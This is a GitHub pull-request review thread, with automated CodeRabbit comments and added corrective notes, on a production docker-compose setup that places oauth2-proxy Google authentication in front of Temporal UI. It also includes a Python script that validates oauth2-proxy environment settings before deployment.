  • docker-compose.prod.yml (1 hunks)
  • docker-compose.yml (5 hunks)
  • scripts/setup_volumes.sh (0 hunks)
💤 Files with no reviewable changes (1)
  • scripts/setup_volumes.sh
🚧 Files skipped from review as they are similar to previous changes (1)
  • docker-compose.yml
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 11-11, 42-42, 45-45, 53-53, 61-61, 68-68, 71-71: trailing spaces (trailing-spaces)
[error] 101-101: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
🔇 Additional comments (3)
.env.example (1)

11-11: Confirm N8N_HOST Default Domain
You’ve added N8N_HOST=n8n.speedandfunction.com to match your production DNS. Please verify this aligns with your ingress or external routing (e.g., if you serve n8n under a subpath or alternate hostname, update accordingly).

README.md (1)

38-39: Great clarification on environment modes
Splitting the startup instructions into development vs. production makes the workflow much clearer for new contributors.

docker-compose.prod.yml (1)

43-49: Verify Cookie & Whitelist Domains
You’ve set .temporal.speedandfunction.com. Confirm your DNS doesn’t duplicate subdomains (e.g., temporal.temporal.speedandfunction.com) and that all intended clients match this domain.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 45-45: trailing spaces (trailing-spaces)

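The checks the review above asks for (a cookie secret of a usable length rather than a placeholder, the COOKIE_SECURE flags that one commit in this PR turned off, a cookie domain that actually covers the redirect host, and an email-domain allow-list that is not a wildcard) can be run against an env block before deploying. The following is an added example written for this page, not code from the PR's repository or from oauth2-proxy. The OAUTH2_PROXY_* names are oauth2-proxy's documented environment variables and the length rule mirrors its documented acceptance of raw or URL-safe base64 secrets of 16, 24 or 32 bytes; the placeholder heuristic is this example's own, and both sample env blocks are constructed.

```python
"""Pre-deploy sanity checks for an oauth2-proxy environment block.
Added example for this PR thread, not code from the repository or from oauth2-proxy.
Parses KEY=VALUE lines (.env or compose `environment:` entries) and returns
(code, message) findings. The sample blocks at the bottom are constructed."""
import base64
import binascii
from urllib.parse import urlparse

VALID_SECRET_LENGTHS = (16, 24, 32)  # AES-128/192/256 key sizes oauth2-proxy accepts
URLSAFE_ALPHABET = set("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-_=")
# Substrings that betray an unchanged template value (heuristic chosen for this example).
PLACEHOLDER_MARKERS = ("your_", "your-", "your.", "changeme", "change_me", "<", ">", "xxx")


def parse_env(text):
    """Parse KEY=VALUE lines; skips blanks, comments and a leading '- ' or 'export '."""
    env = {}
    for raw in text.splitlines():
        line = raw.strip().removeprefix("- ").removeprefix("export ").strip()
        key, sep, value = line.partition("=")
        if sep and not line.startswith("#"):
            env[key.strip()] = value.strip().strip("\"'")
    return env


def cookie_secret_length(secret):
    """Key bytes oauth2-proxy derives: URL-safe base64 if it decodes to a valid AES size,
    else the raw byte length (standard base64 with '+' or '/' therefore counts as raw)."""
    if set(secret) <= URLSAFE_ALPHABET:
        try:
            decoded = base64.urlsafe_b64decode(secret + "=" * (-len(secret) % 4))
            if len(decoded) in VALID_SECRET_LENGTHS:
                return len(decoded)
        except (binascii.Error, ValueError):
            pass
    return len(secret.encode())


def looks_like_placeholder(value):
    return any(marker in value.lower() for marker in PLACEHOLDER_MARKERS)


def split_csv(value):
    return [part.strip() for part in value.split(",") if part.strip()]


def validate_oauth2_proxy_env(text):
    """Return (code, message) findings; an empty list means every check passed."""
    env = parse_env(text)
    findings = []
    secret = env.get("OAUTH2_PROXY_COOKIE_SECRET", "")
    if looks_like_placeholder(secret):
        findings.append(("COOKIE_SECRET_PLACEHOLDER", "cookie secret is still a template value"))
    if (n := cookie_secret_length(secret)) not in VALID_SECRET_LENGTHS:
        findings.append(("COOKIE_SECRET_LENGTH", f"secret yields {n} key bytes, need 16/24/32"))
    redirect = urlparse(env.get("OAUTH2_PROXY_REDIRECT_URL", ""))
    host = (redirect.hostname or "").lower()
    if redirect.scheme != "https":
        findings.append(("REDIRECT_NOT_HTTPS", "OAUTH2_PROXY_REDIRECT_URL must be https"))
    if looks_like_placeholder(host):
        findings.append(("REDIRECT_PLACEHOLDER", f"redirect host {host!r} is a template value"))
    # Secure flags default to true, so only an explicit "false" is a regression.
    for key in ("OAUTH2_PROXY_COOKIE_SECURE", "OAUTH2_PROXY_CSRF_COOKIE_SECURE"):
        if redirect.scheme == "https" and env.get(key, "true").lower() == "false":
            findings.append((key.removeprefix("OAUTH2_PROXY_") + "_FALSE",
                             f"{key}=false lets the browser send that cookie over plain http"))
    # Each cookie domain must cover the host the browser is redirected back to.
    for domain in split_csv(env.get("OAUTH2_PROXY_COOKIE_DOMAINS", "")):
        bare = domain.lower().lstrip(".")
        if host != bare and not host.endswith("." + bare):
            findings.append(("COOKIE_DOMAIN_MISMATCH", f"{domain!r} does not cover {host!r}"))
    # Email domains are the authorization decision: missing or '*' admits any Google account.
    email_domains = split_csv(env.get("OAUTH2_PROXY_EMAIL_DOMAINS", ""))
    if not email_domains:
        findings.append(("EMAIL_DOMAINS_MISSING", "OAUTH2_PROXY_EMAIL_DOMAINS is not set"))
    elif "*" in email_domains:
        findings.append(("EMAIL_DOMAINS_WILDCARD", "OAUTH2_PROXY_EMAIL_DOMAINS=* admits every account"))
    return findings


# Constructed sample: the .env.example placeholders plus the COOKIE_SECURE=false change.
WEAK_ENV = """
OAUTH2_PROXY_COOKIE_SECRET=your_random_cookie_secret
OAUTH2_PROXY_REDIRECT_URL=https://your-domain/oauth2/callback
OAUTH2_PROXY_COOKIE_SECURE=false
OAUTH2_PROXY_CSRF_COOKIE_SECURE=false
OAUTH2_PROXY_EMAIL_DOMAINS=*
OAUTH2_PROXY_COOKIE_DOMAINS=.temporal.example.com
"""
# Constructed passing sample; the secret is the URL-safe base64 of bytes 0..31, fixed for
# determinism. Generate a real one with: openssl rand -base64 32 | tr -- '+/' '-_'
GOOD_ENV = """
OAUTH2_PROXY_COOKIE_SECRET=AAECAwQFBgcICQoLDA0ODxAREhMUFRYXGBkaGxwdHh8=
OAUTH2_PROXY_REDIRECT_URL=https://temporal.example.com/oauth2/callback
OAUTH2_PROXY_COOKIE_SECURE=true
OAUTH2_PROXY_CSRF_COOKIE_SECURE=true
OAUTH2_PROXY_EMAIL_DOMAINS=example.com
OAUTH2_PROXY_COOKIE_DOMAINS=.temporal.example.com
"""

if __name__ == "__main__":
    for name, block in (("weak", WEAK_ENV), ("good", GOOD_ENV)):
        print(name, validate_oauth2_proxy_env(block))
```

Run it against the merged configuration rather than the raw files: `docker compose -f docker-compose.yml -f docker-compose.prod.yml config` prints the `environment:` entries after substitution in the `- KEY=VALUE` form that `parse_env` accepts, so a non-empty findings list can gate the deploy in CI.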
…ervice configuration

Eliminated the DISABLE_SECURITY_PLUGIN environment variable from the opensearch service in docker-compose.prod.yml, streamlining the configuration and enhancing security practices.
@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 3

♻️ Duplicate comments (1)
docker-compose.prod.yml (1)

2-6: 🛠️ Refactor suggestion

Mount the n8n_data volume and add resilience.
You've declared the n8n_data volume but not mounting it in the n8n service. Also consider adding a restart policy and network membership:

 services:
   n8n:
+    restart: unless-stopped
     environment:
       - WEBHOOK_URL=${N8N_WEBHOOK_URL:?N8N_WEBHOOK_URL is required}
       - N8N_ENCRYPTION_KEY=${N8N_ENCRYPTION_KEY:?N8N_ENCRYPTION_KEY is required}
       - N8N_HOST=n8n.speedandfunction.com
+    volumes:
+      - n8n_data:/home/node/.n8n
+    networks:
+      - app-network
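Review bot: `N8N_HOST=n8n.speedandfunction.com` is hard-coded while the two values beside it are mandatory `${VAR:?}` substitutions; move it to the same pattern so a staging deploy cannot inherit the production hostname. On the added mount: `/home/node/.n8n` holds credentials encrypted with N8N_ENCRYPTION_KEY, so once the volume persists that key must stay fixed across restarts and be backed up together with the volume, otherwise the stored credentials become undecryptable.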
🧹 Nitpick comments (5)
docker-compose.prod.yml (5)

1-1: Add a Compose version declaration.
It's best practice to specify a top-level version field (e.g., "3.8") to ensure consistent behavior and compatibility across environments.


17-20: Add a restart policy and network to temporal.
For production resilience and inter-service communication, attach temporal to the network and set a restart policy:

 temporal:
+    restart: unless-stopped
     environment:
       - TEMPORAL_PORT=${TEMPORAL_PORT:?TEMPORAL_PORT is required}
+    networks:
+      - app-network

21-24: Attach temporal-ui to the shared network and add a restart policy.
Since oauth2-proxy depends on temporal-ui via app-network, ensure temporal-ui also sits on that network and recovers on failure:

 temporal-ui:
+    restart: unless-stopped
     environment:
       - TEMPORAL_UI_PORT=${TEMPORAL_UI_PORT:?TEMPORAL_UI_PORT is required}
     ports: []
+    networks:
+      - app-network
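Review bot: `ports: []` on temporal-ui does not remove a host mapping defined in the base docker-compose.yml when the files are layered with `-f docker-compose.yml -f docker-compose.prod.yml`; Compose merges `ports` by concatenating the lists, so an empty list changes nothing and the UI stays reachable on the host without passing through oauth2-proxy. Use `ports: !reset []` (Compose v2.24 or later) or drop the mapping from the base file, and confirm with `docker compose -f docker-compose.yml -f docker-compose.prod.yml config` that temporal-ui ends up with no published port.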

28-29: Pin the OAuth2 Proxy image to a digest.
For stronger reproducibility and supply-chain security, pin the image tag to a specific digest:

-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest-of-v7.8.0>

10-10: Remove trailing whitespace and ensure newline at end-of-file.
YAMLlint flagged trailing spaces on several lines, and the file lacks a final newline. Cleaning these up will prevent lint errors and improve readability.

Also applies to: 41-44, 52-52, 60-60, 67-70, 100-100

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 10-10: trailing spaces (trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 5697b99 and ccbfd4e.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 10-10, 41-41, 44-44, 52-52, 60-60, 67-67, 70-70: trailing spaces (trailing-spaces)
[error] 100-100: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
🔇 Additional comments (1)
docker-compose.prod.yml (1)

26-34: Verify OAuth2 Proxy environment variable names.
Confirm that OAUTH2_PROXY_COOKIE_DOMAINS, OAUTH2_PROXY_WHITELIST_DOMAINS, and related settings align with the v7.8.0 flags (e.g., --cookie-domain, --whitelist-domain) and that the plural forms are supported.

Configured the temporal-ui service in docker-compose.prod.yml to expose port 8081, allowing access to the service on the specified port. This change enhances service accessibility in the production environment.
@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 0

♻️ Duplicate comments (5)
docker-compose.prod.yml (5)

1-2: Duplicate: Add Docker Compose version declaration
It's best practice to specify the Compose file version (version: "3.8") at the top to ensure consistent behavior across different Docker Compose installations.

Apply this diff:

+version: "3.8"
 services:
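Review bot: `version: "3.8"` locks nothing in Compose v2, which ignores the field and prints a warning that it is obsolete; behavior follows the Compose CLI version, not this key. Leave it out rather than adding a line whose only effect is a warning on every `up`.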

2-6: ⚠️ Potential issue

Mount n8n_data volume for persistence
The n8n_data volume is declared later but never mounted in the n8n service. Without this mount, workflows and credentials in n8n will be lost upon container restart.

Apply this diff:

 services:
   n8n:
     environment:
       - WEBHOOK_URL=${N8N_WEBHOOK_URL:?N8N_WEBHOOK_URL is required}
       - N8N_ENCRYPTION_KEY=${N8N_ENCRYPTION_KEY:?N8N_ENCRYPTION_KEY is required}
       - N8N_HOST=n8n.speedandfunction.com
+    volumes:
+      - n8n_data:/home/node/.n8n

27-82: ⚠️ Potential issue

Declare root-level app-network
The oauth2-proxy service is attached to app-network, but there’s no corresponding top-level networks: block. Docker Compose will fail to start the proxy without an explicit declaration.

Add this at the bottom (after volumes:):

 volumes:
   n8n_data:
     …
   postgresql-data:
     …
+networks:
+  app-network:
+    external: false
🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 42-42, 45-45, 53-53, 61-61, 68-68, 71-71: trailing spaces (trailing-spaces)


7-10: ⚠️ Potential issue

Mount opensearch-data volume and add a restart policy
The opensearch-data volume is defined but not mounted in the opensearch service, so indices won’t persist. Adding a restart policy also increases resilience.

Apply this diff:

   opensearch:
     environment:
       - OPENSEARCH_PORT=${OPENSEARCH_PORT:?OPENSEARCH_PORT is required}
+    restart: unless-stopped
+    volumes:
+      - opensearch-data:/usr/share/opensearch/data
🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 10-10: trailing spaces (trailing-spaces)


11-16: ⚠️ Potential issue

Mount postgresql-data volume and add a restart policy
The postgresql-data volume is declared but never mounted, which makes the database ephemeral on container recreation. A restart policy will also ensure automatic recovery.

Apply this diff:

   postgresql:
     environment:
       - POSTGRES_USER=${POSTGRES_USER:?POSTGRES_USER is required}
       - POSTGRES_PASSWORD=${POSTGRES_PASSWORD:?POSTGRES_PASSWORD is required}
       - POSTGRES_DB=${POSTGRES_DB:?POSTGRES_DB is required}
+    restart: unless-stopped
+    volumes:
+      - postgresql-data:/var/lib/postgresql/data
🧹 Nitpick comments (2)
docker-compose.prod.yml (2)

10-10: Remove trailing whitespace
YAML lint reports trailing spaces on several lines, which can lead to parsing warnings. Please strip trailing spaces on the indicated lines.

Example diff (illustrative for one line):

-      - OAUTH2_PROXY_HTTP_ADDRESS=0.0.0.0:8080  
+      - OAUTH2_PROXY_HTTP_ADDRESS=0.0.0.0:8080

Also applies to: 42-42, 45-45, 53-53, 61-61, 68-68, 71-71

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 10-10: trailing spaces (trailing-spaces)


101-101: Add newline at end of file
Ensure there’s a single newline character after the last line to satisfy POSIX standards and avoid lint errors.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 101-101: no new line character at the end of file (new-line-at-end-of-file)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between ccbfd4e and 4c8993b.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 10-10, 42-42, 45-45, 53-53, 61-61, 68-68, 71-71: trailing spaces (trailing-spaces)
[error] 101-101: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)

Removed the port mapping for the temporal-ui service in docker-compose.prod.yml, ensuring a clean configuration without hardcoded values. This change aligns with the current service setup and enhances flexibility in port management.
@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 2

♻️ Duplicate comments (4)
docker-compose.prod.yml (4)

79-81: ⚠️ Potential issue

Declare the app-network at the root level
The oauth2-proxy service attaches to app-network, but there’s no corresponding networks: block, causing Compose failures.

 volumes:
   n8n_data:
     driver: local
     driver_opts:
       type: none
       o: bind
       device: /data/n8n
+networks:
+  app-network:
+    external: false
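Review bot: with `type: none` and `o: bind`, Docker does not create `/data/n8n`; if the directory is missing the volume mount fails when the container starts, and n8n runs as the unprivileged `node` user (uid 1000), so the directory must exist and be writable by that uid before the first `up`. That prerequisite belongs in the deploy steps alongside the `networks:` block this diff adds.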

Shall I add this at the end of the file?


7-9: ⚠️ Potential issue

Persist and scope the OpenSearch service
The opensearch service defines the opensearch-data volume but never mounts it. It also needs a restart policy and network attachment to be production-ready.

   opensearch:
+    restart: unless-stopped
+    volumes:
+      - opensearch-data:/usr/share/opensearch/data
+    networks:
+      - app-network
     environment:
       - OPENSEARCH_PORT=${OPENSEARCH_PORT:?OPENSEARCH_PORT is required}

Would you like me to generate the full service snippet?


11-15: ⚠️ Potential issue

Enable persistence for PostgreSQL
The postgresql-data volume is declared but not mounted. Add a restart policy and network assignment to ensure data durability and connectivity.

   postgresql:
+    restart: unless-stopped
+    volumes:
+      - postgresql-data:/var/lib/postgresql/data
+    networks:
+      - app-network
     environment:
       - POSTGRES_USER=${POSTGRES_USER:?POSTGRES_USER is required}
       - POSTGRES_PASSWORD=${POSTGRES_PASSWORD:?POSTGRES_PASSWORD is required}
       - POSTGRES_DB=${POSTGRES_DB:?POSTGRES_DB is required}

Happy to help integrate this if needed.


1-6: ⚠️ Potential issue

Ensure n8n service resilience and persistence
The n8n service currently lacks a restart policy, network scoping, and the volume mount for the n8n_data volume. Without these, failures won’t self-recover, and workflows/credentials won’t persist.

Apply this diff to address it:

 services:
   n8n:
+    restart: unless-stopped
+    networks:
+      - app-network
     environment:
       - WEBHOOK_URL=${N8N_WEBHOOK_URL:?N8N_WEBHOOK_URL is required}
       - N8N_ENCRYPTION_KEY=${N8N_ENCRYPTION_KEY:?N8N_ENCRYPTION_KEY is required}
       - N8N_HOST=n8n.speedandfunction.com
+    volumes:
+      - n8n_data:/home/node/.n8n

Let me know if you’d like me to expand this across all services or file an issue for tracking persistence enhancements.

🧹 Nitpick comments (2)
docker-compose.prod.yml (2)

26-35: Pin the OAuth2 Proxy image to an immutable digest
Using a mutable tag (v7.8.0) introduces supply-chain risk. It’s best practice to reference a specific SHA256 digest.

-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest-of-v7.8.0>

I can help you look up the correct digest or automate this pinning.


10-10: Remove trailing spaces and add a newline at end-of-file
Several lines have trailing whitespace, and the file is missing a final newline. Cleaning this up will satisfy YAML linting rules.

Please strip the trailing spaces on the noted lines and ensure the file ends with a single newline.

Also applies to: 41-41, 44-44, 52-52, 60-60, 67-67, 70-70, 100-100

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 10-10: trailing spaces (trailing-spaces)

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 4c8993b and 6a19e0e.

📒 Files selected for processing (1)
  • docker-compose.prod.yml (1 hunks)
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 10-10, 41-41, 44-44, 52-52, 60-60, 67-67, 70-70: trailing spaces (trailing-spaces)
[error] 100-100: no new line character at the end of file (new-line-at-end-of-file)

⏰ Context from checks skipped due to timeout of 90000ms (1)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)

@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 0

♻️ Duplicate comments (1)
docker-compose.prod.yml (1)

79-81: ⚠️ Potential issue

Define and attach services to the app-network
The oauth2-proxy service is connected to app-network, but:

  1. There’s no root-level networks: declaration for app-network, causing Compose to error.
  2. The target temporal-ui (and temporal) aren’t part of app-network, so the proxy cannot forward traffic.

Apply these diffs:

--- a/docker-compose.prod.yml
+++ b/docker-compose.prod.yml
@@ volumes:
   postgresql-data:
@@
+networks:
+  app-network:
+    external: false

@@ services:
   temporal-ui:
+    networks:
+      - app-network

   temporal:
+    networks:
+      - app-network
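Review bot: giving temporal and temporal-ui an explicit `networks:` list detaches them from the project's implicit `default` network; they then only reach services that are also on `app-network`, so temporal loses its route to postgresql and opensearch unless those services are attached as well (or `default` is listed next to `app-network`). Attach every service in the dependency chain, then check the merged output with `docker compose config` and verify name resolution from the temporal container to postgresql after the change.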
🧹 Nitpick comments (3)
docker-compose.prod.yml (3)

26-35: Pin the OAuth2 Proxy image to a digest for supply-chain security
Relying on a mutable image tag (v7.8.0) can introduce supply-chain risks and makes deployments harder to reproduce.
Apply this diff to pin the image:

-    image: quay.io/oauth2-proxy/oauth2-proxy:v7.8.0
+    image: quay.io/oauth2-proxy/oauth2-proxy@sha256:<digest-of-v7.8.0>

41-70: Remove trailing spaces on blank lines
Static analysis detected trailing spaces on several blank lines within the environment section. Cleaning these up improves maintainability and silences YAML lint warnings.

🧰 Tools
🪛 YAMLlint (1.35.1)
[error] 41-41, 44-44, 52-52, 60-60, 67-67, 70-70: trailing spaces (trailing-spaces)


73-77: Harden the healthcheck command
Using wget may not be available in all environments and can obscure failures. Consider switching to curl with Docker’s CMD-SHELL form for clearer semantics:

-      test: ["CMD", "wget", "-O", "/dev/null", "-q", "http://localhost:8080/oauth2/health"]
+      test: ["CMD-SHELL", "curl -f http://localhost:8080/oauth2/health || exit 1"]
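Review bot: swapping wget for curl does not help if the pinned image carries neither: the default quay.io/oauth2-proxy/oauth2-proxy image is distroless, with no shell, curl or wget, so both the original `CMD` form and this `CMD-SHELL` form fail and the container is reported unhealthy forever. Pin the `-alpine` tag, probe from outside the container, or drop the in-container check. Also confirm the path: oauth2-proxy's liveness endpoint is the one set by `--ping-path` (default `/ping`), so verify that `/oauth2/health` returns 200 without a session before wiring it into a healthcheck.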
📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 6a19e0e and c4f8502.

📒 Files selected for processing (3)
  • README.md (1 hunks)
  • docker-compose.prod.yml (1 hunks)
  • docker-compose.yml (2 hunks)
🚧 Files skipped from review as they are similar to previous changes (2)
  • README.md
  • docker-compose.yml
🧰 Additional context used
🪛 YAMLlint (1.35.1)
docker-compose.prod.yml
[error] 41-41, 44-44, 52-52, 60-60, 67-67, 70-70: trailing spaces (trailing-spaces)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (1)
docker-compose.prod.yml (1)

23-25: Intentional removal of ports mapping for temporal-ui
Resetting the ports section prevents the UI from being exposed directly on the host, ensuring that only the OAuth2 proxy can route external traffic. Confirm that internal routing to temporal-ui:8080 still functions as expected.

Added a note to the OAuth2 Proxy setup guide instructing users to adjust domain values to match their deployment environment.
@anatolyshipitz anatolyshipitz requested a review from killev April 29, 2025 06:30
Added a comprehensive Table of Contents to the top of the README for improved navigation and usability. This includes quick links to all major sections and documentation references.
@coderabbitai coderabbitai Bot left a comment

Actionable comments posted: 1

📜 Review details

Configuration used: CodeRabbit UI
Review profile: CHILL
Plan: Pro

📥 Commits

Reviewing files that changed from the base of the PR and between 248788e and b0afa64.

📒 Files selected for processing (1)
  • README.md (2 hunks)
🧰 Additional context used
🪛 markdownlint-cli2 (0.17.2)
README.md
19-19: Link fragments should be valid (MD051, link-fragments)

⏰ Context from checks skipped due to timeout of 90000ms (2)
  • GitHub Check: Docker Security Scanning (n8n, Dockerfile.n8n, n8n-test:latest)
  • GitHub Check: Service Availability Check
🔇 Additional comments (3)
README.md (3)

3-4: Well done adding a Table of Contents.
This new “## Table of Contents” section will greatly improve navigation for readers.


5-18: All internal TOC links look correct.
Each anchor from Services through GitHub MCP Configuration corresponds to an existing heading in this README.


172-172: Correctly updated Service Ports to reflect OAuth2 Proxy.
Updating “Temporal UI” to “Temporal UI / OAuth2 Proxy” clarifies that the proxy now front-ends the UI on port 8080.

Changed "Documentation" from a link to a plain section in the table of contents for improved clarity and consistency
@anatolyshipitz anatolyshipitz requested a review from killev April 29, 2025 12:35

@killev killev left a comment

LGTM.

@anatolyshipitz anatolyshipitz merged commit 5b88888 into main Apr 29, 2025
11 checks passed
@anatolyshipitz anatolyshipitz deleted the feature/64524-temporal-ui-google-auth branch April 29, 2025 12:54
3 participants